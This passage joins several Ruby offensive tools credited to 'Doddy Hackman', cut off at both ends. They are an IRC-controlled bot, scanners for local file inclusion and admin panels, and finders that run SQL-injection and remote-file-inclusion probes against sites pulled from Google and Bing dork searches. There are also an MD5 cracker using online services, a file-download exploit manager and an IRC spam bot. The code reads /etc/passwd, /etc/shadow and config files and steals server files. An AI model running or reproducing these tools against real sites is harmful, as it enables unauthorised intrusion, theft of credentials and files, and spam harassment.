files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
resultado = resultado + "[+] Testing the vulnerability LFI...\n\n"
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
resultado = resultado + "[+] LFI Detected\n\n"
resultado = resultado + "[Full Path Discloure]: "+fpd+"\n"
resultado = resultado + "\n[+] Fuzzing Files\n\n"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
resultado= resultado + "[Link] : "+web+file+"\n"
end
end
resultado = resultado + "\n[+] Done\n"
else
resultado = resultado + "[-] Not Vulnerable to LFI\n\n"
end
return resultado
end
def scanner_panel(page)
resultado = ""
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
resultado = resultado + "[+] Scanning ...\n\n"
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"\n"
control = "1"
end
end
end
if control=="1"
resultado = resultado + "\n[+] Done\n"
else
resultado = resultado + "\n[-] Not Found\n"
end
return resultado
end
def get_httpfinger(page)
resultado = ""
resultado = resultado + "[+] Searching ...\n\n"
resultado = resultado + httpfinger(page)
return resultado
end
def crack_md5(md5)
resultado = ""
resultado = resultado + "[+] Cracking ...\n\n"
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/b>/
password = $1
resultado = resultado + "[+] md5online.net -> "+password+"\n"
else
resultado = resultado + "[-] md5online.net -> Not Found" + "\n"
end
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
resultado = resultado + "[+] md5.my-addr.co -> "+password+"\n"
else
resultado = resultado + "[-] md5.my-addr.co -> Not Found" +"\n"
end
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
resultado = resultado + "[+] md5decryption.com -> "+password+"\n"
else
resultado = resultado + "[-] md5decryption.com -> Not Found"+"\n"
end
return resultado
end
def tiny_url(page)
resultado = ""
code = toma("http://tinyurl.com/api-create.php?url="+page)
if code=~/http/
resultado = resultado + "[+] Link : "+code
else
resultado = resultado + "[-] Error"
end
return resultado
end
def codificar_hex(text)
return "[+] Result : "+encode_hex(text)
end
def decodificar_hex(text)
return "[+] Result : "+decode_hex(text)
end
def codificar_base64(text)
return "[+] Result : "+Base64.encode64(text).chomp
end
def decodificar_base64(text)
return "[+] Result : "+Base64.decode64(text).chomp
end
def codificar_ascii(text)
resultado = ""
resultado = resultado + "[+] Result : "+text.split("").map(&:ord).to_s
return resultado
end
def md5_encode(text)
return "[+] Result : "+Digest::MD5.hexdigest(text).chomp
end
def scanner_dns(domain)
paths = ["www","www1","www2","www3","ftp","ns","mail","3com","aix","apache","back","bind","boreder","bsd","business","chains","cisco","content","corporate","cpv","dns","domino","dominoserver","download","e-mail","e-safe","email","esafe","external","extranet","firebox","firewall","front","fw","fw0","fwe","fw-1","firew","gate","gatekeeper","gateway","gauntlet","group","help","hop","hp","hpjet","hpux","http","https","hub","ibm","ids","info","inside","internal","internet","intranet","ipfw","irix","jet","list","lotus","lotusdomino","lotusnotes","lotusserver","mailfeed","mailgate","mailgateway","mailgroup","mailhost","maillist","mailpop","mailrelay","mimesweeper","ms","msproxy","mx","nameserver","news","newsdesk","newsfeed","newsgroup","newsroom","newsserver","nntp","notes","noteserver","notesserver","nt","outside","pix","pop","pop3","pophost","popmail","popserver","print","printer","private","proxy","proxyserver","public","qpop","raptor","read","redcreek","redhat","route","router","scanner","screen","screening","ecure","seek","smail","smap","smtp","smtpgateway","smtpgw","solaris","sonic","spool","squid","sun","sunos","suse","switch","transfer","trend","trendmicro","vlan","vpn","wall","web","webmail","webserver","webswitch","win2000","win2k","upload","file","fileserver","storage","backup","share","core","gw","wingate","main","noc","home","radius","security","access","dmz","domain","sql","mysql","mssql","postgres","db","database","imail","imap","exchange","sendmail","louts","test","logs","stage","staging","dev","devel","ppp","chat","irc","eng","admin","unix","linux","windows","apple","hp-ux","bigip","pc"]
resultado = ""
resultado = resultado + "[+] Searching DNS ...\n\n"
control = "0"
paths.each do |path|
begin
url = "http://"+path+"."+domain
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"\n"
control = "1"
end
end
end
if control=="1"
resultado = resultado + "\n[+] Done\n"
else
resultado = resultado + "\n[-] Not Found\n"
end
return resultado
end
def sqli_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...\n\n"
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found\n"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]\n"
else
resultado = resultado + " [FAIL]\n"
end
rescue
resultado = resultado + " [FAIL]\n"
end
end
resultado = resultado + "\n[+] Finished\n"
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...\n\n"
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...\n\n"
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]\n"
else
resultado = resultado + " [FAIL]\n"
end
rescue
resultado = resultado + " [FAIL]\n"
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
def rfi_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...\n\n"
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found\n"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]\n"
else
resultado = resultado + " [FAIL]\n"
end
rescue
resultado = resultado + " [FAIL]\n"
end
end
resultado = resultado + "\n[+] Finished\n"
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...\n\n"
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...\n\n"
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]\n"
else
resultado = resultado + " [FAIL]\n"
end
rescue
resultado = resultado + " [FAIL]\n"
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
#
def respuesta(to,texto)
resultado = texto.split("\n")
resultado.flatten.each do |linea|
if linea != ""
$irc.print "PRIVMSG #{to} #{linea}\n"
sleep $timeout.to_i
end
end
end
def bot_online(host,port,canal,admin)
print "\n[+] Connecting ...\n"
begin
$irc = TCPSocket.open(host,port)
rescue
print "\n[-] Error connecting\n"
else
nick = "ClapTrap"
$irc.print "NICK "+nick+"\r\n"
$irc.print "USER "+nick+" 1 1 1 1\r\n"
$irc.print "JOIN #{canal}\r\n"
print "\n[+] Online\n"
while 1
code = $irc.recv(9999)
if code=~/PING (.*)/
$irc.print "PONG #{$1}\n"
end
if code=~/:(.*)!(.*) PRIVMSG (.*) :(.*)/
dedonde = $1
mensaje = $4
if dedonde==admin
if mensaje=~/!sqli (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,scanner_sqli(arg1,"--"))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!lfi (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,scanner_lfi(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!panel(.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,scanner_panel(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!fuzzdns (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,scanner_dns(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!locateip (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin, locateip(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!sqlifinder (.*) (.*) (.*)/
arg1 = $1
arg2 = $2
arg3 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,sqli_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!rfifinder (.*) (.*) (.*)/
arg1 = $1
arg1 = $2
arg1 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,rfi_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!crackit (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,crack_md5(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!tinyurl (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,tiny_url(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!httpfinger (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,get_httpfinger(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!md5 (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,md5_encode(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!base64 (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,codificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,decodificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
end
if mensaje=~/!hex (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,codificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,decodificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
end
if mensaje=~/!ascii (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n"
respuesta(admin,codificar_ascii(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n"
end
if mensaje=~/!help/
about = ""
about = about + "Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014" + "\n";
about = about + "[++] Commands" + "\n";
about = about + "[+] !help" + "\n";
about = about + "[+] !locateip <web>" + "\n";
about = about + "[+] !sqlifinder <dork> <count pages> <google/bing>" + "\n";
about = about + "[+] !rfifinder <dork> <count pages> <google/bing>" + "\n";
about = about + "[+] !panel <page>" + "\n";
about = about + "[+] !fuzzdns <domain>" + "\n";
about = about + "[+] !sqli <page>" + "\n";
about = about + "[+] !lfi <page>" + "\n";
about = about + "[+] !crackit <hash>" + "\n";
about = about + "[+] !tinyurl <page>" + "\n";
about = about + "[+] !httpfinger <page>" + "\n";
about = about + "[+] !md5 <text>" + "\n";
about = about + "[+] !base64 <encode/decode> <text>" + "\n";
about = about + "[+] !ascii <encode/decode> <text>" + "\n";
about = about + "[+] !hex <encode/decode> <text>" + "\n";
about = about + "[++] Enjoy this IRC Bot" + "\n";
respuesta(admin,about)
end
end
end
end
end
end
head()
print "[+] Host : "
host = gets.chomp
print "\n[+] Port : "
port = gets.chomp
print "\n[+] Channel : "
channel = gets.chomp
print "\n[+] Admin : "
admin = gets.chomp
bot_online(host,port,channel,admin)
copyright()
# The End ?
#!usr/bin/ruby
#KingSpam 0.4
#Coded By Doddy H
require "socket"
$nicks = ["ruben","negro jose","rasputin","juancho"]
def head()
print "\n\n == -- KingSpam 0.4 -- ==\n\n"
end
def uso()
print "\n[+] Sintax : #{$0} <host> <channel> <spam list>\n"
end
def copyright()
print "\n\n(C) Doddy Hackman 2012\n\n"
end
def read_file(file)
array = []
File.open(file, "r") do |lineas|
while (linea = lineas.gets)
array.push(linea)
end
end
return array
end
def load(host,canal,spam_list)
print "\n[+] Connecting ...\n"
begin
irc = TCPSocket.open(host,"6667")
rescue
print "\n[-] Error\n"
else
lineas = read_file(spam_list)
nick_azar = $nicks[rand($nicks.size)]
irc.print "NICK "+nick_azar+"\r\n"
irc.print "USER "+nick_azar+" 1 1 1 1\r\n"
irc.print "JOIN #{canal}\r\n"
print "\n[+] Online\n"
while 1
code = irc.recv(9999)
#print code+"\n"
if code=~/PING (.*)/
irc.print "PONG #{$1}\n"
end
if code=~/:(.*) 353 (.*) = (.*) :(.*)/
nicks_found = $4
nicks = nicks_found.split(" ")
end
print "\n[+] The party started\n\n"
while 1
sleep(20) # 1 minute
texto = lineas[rand(lineas.size)]
print "[+] Spamming channel #{canal}\n"
irc.print "PRIVMSG #{canal} #{texto}\n"
nicks.flatten.each do |nick|
if nick!=nick_azar
nick = nick.sub("+","")
nick = nick.sub("@","")
print "[+] Spam User : "+nick+"\n"
irc.print "PRIVMSG #{nick} #{texto}\n"
end
end
end
end
end
end
head()
host = ARGV[0]
canal = ARGV[1]
spam_list = ARGV[2]
if !host and !canal and !spam_list
uso()
else
load(host,canal,spam_list)
end
copyright()
# The End ?
#!usr/bin/ruby
#FSD Exploit Manager 0.3
require "open-uri"
require "net/http"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def uso
print "\n[+] Sintax : ruby locateip.rb <target>\n"
end
def head
print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end
def installer
if not Dir.exists?("logs")
Dir.mkdir "logs"
end
Dir.chdir("logs")
end
def download(file,name)
File.open(name, "wb") do |saved_file|
open(file, "rb") do |read_file|
saved_file.write(read_file.read)
end
end
end
def scan_fsd(target)
print "\n[+] Scanning ...\n\n"
path = File.basename(URI(target).path)
code = toma(target+path)
if code=~/header\((.*)Content-Disposition: attachment;/
print "[+] Vulnerable !\n"
while(1)
print "\n[+] Insert Filename : "
filename = STDIN.gets.chomp
if filename=="exit"
copyright()
else
download(target+filename,filename)
print "\n[+] Downloaded !\n"
end
end
else
print "[-] Not vulnerable\n"
end
end
target = ARGV[0]
installer()
head()
if !target
uso()
else
scan_fsd(target)
end
copyright()
#The End ?
#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015
require "open-uri"
require "net/http"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def uso
print "\n[+] Sintax : ruby lfi.rb <page>\n"
end
def head
print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end
def scan(web)
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
print "\n[+] Testing the vulnerability LFI...\n\n"
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
print "[+] LFI Detected\n\n"
print "[Full Path Discloure]: "+fpd+"\n"
print "\n[+] Fuzzing Files\n\n"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
print "[Link] : "+web+file+"\n"
end
end
print "\n[+] Finish\n"
copyright()
else
print "[-] Not Vulnerable to LFI\n\n"
end
end
#
page = ARGV[0]
head()
if !page
uso()
else
scan(page)
end
copyright()
#The End ?
#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015
require "tk"
require "net/http"
require "open-uri"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
#
window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'
TkLabel.new(window) do
background "black"
foreground "cyan"
text " Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end
web= TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}
TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end
console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end
TkButton.new(window) do
text "Search"
background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground "cyan"
command proc{
web = web.value.to_s
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/l